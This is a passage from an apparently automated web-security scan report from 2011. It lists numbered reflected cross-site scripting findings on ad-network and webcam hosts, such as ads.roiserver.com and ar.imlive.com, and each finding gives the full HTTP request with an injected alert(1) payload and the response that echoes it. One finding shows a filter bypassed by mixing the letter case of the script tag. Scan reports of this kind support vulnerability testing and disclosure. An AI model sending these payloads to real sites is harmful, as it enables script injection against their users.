   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.7;abr=!ie;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?dc3cc"-alert(1)-"89837e3663b",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) =============
...[SNIP]...

4.143. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57390.9231.302br.net
Path:   /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 881c8"-alert(1)-"8139a7defa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7?881c8"-alert(1)-"8139a7defa5=1 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7E827396F7BF67C1E502BB2D40424D9B; Path=/
Content-Type: text/javascript
Content-Length: 6834
Date: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.7?881c8"-alert(1)-"8139a7defa5=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ===========
...[SNIP]...

4.144. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97cc9"><script>alert(1)</script>2c0fb4b63c9 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=97cc9"><script>alert(1)</script>2c0fb4b63c9 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15001%7C15001%7C15001%7C15001%7C15001%7C15002%7C15002%7C14983%7C15002; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 16:37:16 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 16:37:16 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3895982606775233875&fpid=97cc9"><script>alert(1)</script>2c0fb4b63c9&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.145. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d1f6b<script>alert(1)</script>6ed7f121a0a was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=7hSy8PbjRnOXSf2i_40364845d1f6b<script>alert(1)</script>6ed7f121a0a HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6607FF9B548A802C9DD6B8C4F5986A9A; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 16:37:19 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_7hSy8PbjRnOXSf2i_40364845d1f6b<script>alert(1)</script>6ed7f121a0a".replace(/[^\w\d]/g,""),"7hSy8PbjRnOXSf2i_40364845d1f6b<script>
...[SNIP]...

4.146. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f28b8"-alert(1)-"6a97e4dd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038&f28b8"-alert(1)-"6a97e4dd9a=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:56:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 29 Jan 2011 01:56:11 GMT
Pragma: no-cache
Content-Length: 4633
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&f28b8"-alert(1)-"6a97e4dd9a=1&s=1603038&_salt=4229063232";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.147. http://ads.roiserver.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2be2a'%3balert(1)//1e4afaaa4ee was submitted in the h parameter. This input was echoed as 2be2a';alert(1)//1e4afaaa4ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0CC81D8&w=300&h=2502be2a'%3balert(1)//1e4afaaa4ee&rnd= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Fri, 28 Jan 2011 16:44:01 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="2502be2a';alert(1)//1e4afaaa4ee" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.148. http://ads.roiserver.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90072"%3balert(1)//78cfa7c28ea was submitted in the pid parameter. This input was echoed as 90072";alert(1)//78cfa7c28ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0CC81D890072"%3balert(1)//78cfa7c28ea&w=300&h=250&rnd= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Fri, 28 Jan 2011 16:43:59 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D890072";alert(1)//78cfa7c28ea&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.149. http://ads.roiserver.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c51d0'%3balert(1)//00d506c594f was submitted in the w parameter. This input was echoed as c51d0';alert(1)//00d506c594f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0CC81D8&w=300c51d0'%3balert(1)//00d506c594f&h=250&rnd= HTTP/1.1
Host: ads.roiserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Fri, 28 Jan 2011 16:44:00 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=0CC81D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300c51d0';alert(1)//00d506c594f" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.150. http://adsfac.us/ag.asp [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload ddf63<script>alert(1)</script>8c447564c06 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=ddf63<script>alert(1)</script>8c447564c06&source=js&ord=5596043 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sat, 29 Jan 2011 01:55:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c060=uid=10961381; expires=Sun, 30-Jan-2011 01:56:08 GMT; path=/
Set-Cookie: FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c06=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4045&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Tue, 01-Mar-2011 01:56:08 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 29 Jan 2011 01:56:07 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=ddf63<script>alert(1)</script>8c447564c06.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

4.151. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3ce'-alert(1)-'6c601d061a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5b3ce'-alert(1)-'6c601d061a=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vc4twg45dvbaxrjcyazsha21; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=vc4twg45dvbaxrjcyazsha21; path=/; HttpOnly
Set-Cookie: spvdr=vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:45 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:45 GMT
Connection: close
Content-Length: 19131
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/?5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&iy=dallas&id=44&iu=1&vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv
...[SNIP]...

4.152. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26eb"><script>alert(1)</script>f467ed2684e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b26eb"><script>alert(1)</script>f467ed2684e=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:27 GMT
Connection: close
Content-Length: 21363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?b26eb"><script>alert(1)</script>f467ed2684e=1');return false;">
...[SNIP]...

4.153. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fqzehq45mvboz255wmce5e45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fqzehq45mvboz255wmce5e45; path=/; HttpOnly
Set-Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:44 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:43 GMT
Connection: close
Content-Length: 19557
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||94ad3"><script>alert(1)</script>4f479a42c47~1');return false;">
...[SNIP]...

4.154. http://ar.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f889"><script>alert(1)</script>305652e0e15 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:36 GMT
Connection: close
Content-Length: 23511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.155. http://ar.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 650a2"><script>alert(1)</script>068f5418f8 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
